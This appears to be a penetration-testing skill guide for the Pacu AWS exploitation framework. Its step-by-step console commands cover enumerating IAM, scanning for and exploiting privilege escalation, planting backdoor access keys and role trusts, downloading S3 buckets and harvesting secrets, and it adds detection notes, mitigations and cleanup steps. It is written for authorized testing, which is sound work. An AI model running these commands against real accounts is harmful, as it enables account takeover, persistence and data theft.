Exploiting AWS with Pacu

Legal Notice: This skill is for authorized penetration testing and educational purposes only. Pacu performs active enumeration, privilege escalation, persistence, and backdooring against live AWS accounts. Run it ONLY against accounts you own or have explicit written authorization (scope/Rules of Engagement) to test. Many modules create durable changes (new IAM users, access keys, policies); track and remove everything. Unauthorized use is illegal under the CFAA and equivalent laws.

Overview

Pacu is the open-source AWS exploitation framework from Rhino Security Labs. It is the cloud-pentest analogue of Metasploit: a modular Python console that manages target sessions, enumerates an AWS account, identifies privilege-escalation paths, and executes persistence/backdooring/exfiltration modules — all backed by a local SQLite database that records every enumerated resource so modules can chain off one another's findings.

A Pacu engagement follows a consistent arc. You create a named session, load AWS keys (with set_keys or by importing from ~/.aws/credentials), confirm the identity with whoami, then enumerate IAM and the rest of the account. The flagship workflow is iam__enum_permissions followed by iam__privesc_scan, which checks the compromised principal against ~20 known AWS IAM privilege-escalation primitives (e.g. iam:CreatePolicyVersion, iam:AttachUserPolicy, iam:PassRole + lambda:CreateFunction, sts:AssumeRole) and can auto-exploit them. Persistence modules such as iam__backdoor_users_keys mint a second access key on an existing user, and iam__backdoor_assume_role adds a trust to a role so the attacker can assume it later.

This skill covers installing Pacu, session and credential management, IAM enumeration, automated privilege-escalation scanning and exploitation, persistence/backdooring, and data access — every command and module name verified against the Rhino Security Labs project. Source: github.com/RhinoSecurityLabs/pacu.

When to Use

Conducting an authorized AWS cloud penetration test or red-team engagement
Assessing the blast radius of a single compromised IAM credential (privesc scanning)
Demonstrating persistence/backdoor techniques to drive remediation
Generating realistic attacker telemetry to test cloud detections (purple team)
Mapping an unfamiliar AWS account's IAM, EC2, S3, and Lambda exposure

Prerequisites

Pacu installed:

  python3 -m pip install -U pip
  python3 -m pip install -U pacu     # then run: pacu
  # or, preferred on Kali, with pipx:
  pipx install git+https://github.com/RhinoSecurityLabs/pacu.git
  # or Docker:
  docker run -it rhinosecuritylabs/pacu:latest

AWS access key/secret (and optional session token) for the in-scope target principal
A signed authorization / Rules of Engagement document defining scope
Python 3.9+ and outbound HTTPS to AWS API endpoints
AWS CLI installed for verification (aws sts get-caller-identity)

Objectives

Install Pacu and create an isolated engagement session
Load and validate target AWS credentials
Enumerate IAM permissions for the compromised principal
Identify and (where authorized) exploit privilege-escalation paths
Establish persistence via backdoor access keys and role trusts
Enumerate and access data in EC2, S3, and Secrets Manager
Export findings for reporting and ensure all artifacts are removed

MITRE ATT&CK Mapping

| ID | Name | Use in this skill | |----|------|-------------------| | T1078.004 | Valid Accounts: Cloud Accounts | Pacu operates as a valid AWS principal and abuses its permissions | | T1098.001 | Account Manipulation: Additional Cloud Credentials | iam__backdoor_users_keys mints a second access key | | T1098.003 | Account Manipulation: Additional Cloud Roles | iam__backdoor_assume_role / privesc via role policy changes | | T1580 | Cloud Infrastructure Discovery | ec2__enum, iam__enum_users_roles_policies_groups | | T1530 | Data from Cloud Storage | s3__download_bucket retrieves S3 objects | | T1552.005 | Unsecured Credentials: Cloud Instance Metadata API | EC2 IMDS credential abuse |

Workflow

1. Launch Pacu and create a session

pacu
# In the Pacu console:
Pacu> set_keys
#   key alias  : engagement-target
#   access key : AKIA...
#   secret key : ...
#   session tok: (optional)

2. Confirm the identity you are operating as

Pacu> whoami
Pacu> run aws sts get-caller-identity     # or, outside Pacu: aws sts get-caller-identity

3. Enumerate IAM entities and the compromised principal's permissions

Pacu> run iam__enum_users_roles_policies_groups
Pacu> run iam__enum_permissions
Pacu> data IAM            # review what was collected into the session DB

4. Scan for privilege-escalation paths

iam__privesc_scan checks the principal against known AWS privesc primitives and lists viable methods.

Pacu> run iam__privesc_scan
# To attempt automated exploitation of a discovered method:
Pacu> run iam__privesc_scan --offline      # analyze without making changes

5. Establish persistence with a backdoor access key

Pacu> run iam__backdoor_users_keys --usernames target-user
# Add an assumable-role trust for long-term access:
Pacu> run iam__backdoor_assume_role --role-names target-role --user-arns arn:aws:iam::111122223333:user/attacker

6. Enumerate compute and storage

Pacu> run ec2__enum
Pacu> run s3__download_bucket --names target-bucket
Pacu> data S3

7. Harvest secrets

Pacu> run secrets__enum

8. Non-interactive execution (CI / scripted)

Pacu supports one-shot module execution from the shell.

pacu --session engagement --module-name iam__enum_users_roles_policies_groups --exec
pacu --session engagement --module-name s3__download_bucket \
     --module-args "--names target-bucket" --exec

9. Export findings and clean up

Pacu> data all > /dev/stdout         # review collected data
# Manually remove every backdoor created (record ARNs/key IDs first):

aws iam delete-access-key --user-name target-user --access-key-id AKIA_BACKDOOR
aws iam update-assume-role-policy --role-name target-role --policy-document file://original-trust.json

See scripts/agent.py to drive the enumerate->privesc flow non-interactively.

Tools and Resources

| Resource | Purpose | Link | |----------|---------|------| | Pacu GitHub | Source, modules, wiki | https://github.com/RhinoSecurityLabs/pacu | | Pacu module list | Per-module documentation | https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details | | Rhino AWS privesc research | The privesc primitives iam__privesc_scan checks | https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ | | AWS IAM docs | Permission and policy reference | https://docs.aws.amazon.com/IAM/latest/UserGuide/ | | CloudGoat | Vulnerable AWS lab to practice safely | https://github.com/RhinoSecurityLabs/cloudgoat |

OPSEC and Detection Considerations

Pacu modules are noisy and durable; an operator must plan for both detection and cleanup:

iam__enum_permissions and iam__enum_users_roles_policies_groups generate a large

burst of iam:List/iam:Get calls visible in CloudTrail and GuardDuty (Discovery:IAMUser/AnomalousBehavior).

iam__privesc_scan in non-offline mode can make state-changing calls

(iam:CreatePolicyVersion, iam:AttachUserPolicy); use --offline for analysis only.

iam__backdoor_users_keys triggers iam:CreateAccessKey, and

iam__backdoor_assume_role triggers iam:UpdateAssumeRolePolicy — both are high-signal persistence indicators that defenders alert on.

Record every artifact ID (access keys, policy versions, role-trust changes) so each

can be reverted; orphaned backdoors are both an OPSEC failure and a real risk to the client.

Defensive Mitigations to Recommend

| Finding | Remediation | |---------|-------------| | Over-permissive IAM principal (privesc path) | Apply least privilege; scope iam:PassRole with conditions | | iam:CreatePolicyVersion / SetDefaultPolicyVersion allowed | Remove from non-admin roles | | Long-lived access keys | Enforce key rotation; prefer roles / short-lived STS creds | | No detection on key creation | Alert on CreateAccessKey / UpdateAssumeRolePolicy in CloudTrail |

Key Module Reference

| Module | Purpose | |--------|---------| | iam__enum_users_roles_policies_groups | Enumerate all IAM principals and policies | | iam__enum_permissions | Resolve the current principal's effective permissions | | iam__privesc_scan | Identify (and optionally exploit) privesc paths | | iam__backdoor_users_keys | Create a backdoor access key on a user | | iam__backdoor_assume_role | Add an attacker-controlled trust to a role | | ec2__enum | Enumerate EC2 instances, volumes, snapshots | | s3__download_bucket | Download objects from an S3 bucket | | secrets__enum | Enumerate Secrets Manager / SSM parameters |

Validation Criteria

[ ] Pacu installed and console launches
[ ] Engagement session created and keys loaded
[ ] Identity confirmed with whoami / sts get-caller-identity
[ ] IAM entities and current-principal permissions enumerated
[ ] iam__privesc_scan run and viable paths documented
[ ] Persistence module behavior demonstrated (in authorized scope)
[ ] EC2/S3/secrets enumeration completed
[ ] All created backdoors (keys, role trusts, policies) recorded and removed
[ ] Findings exported for the engagement report
[ ] No residual attacker artifacts remain in the account

Pacu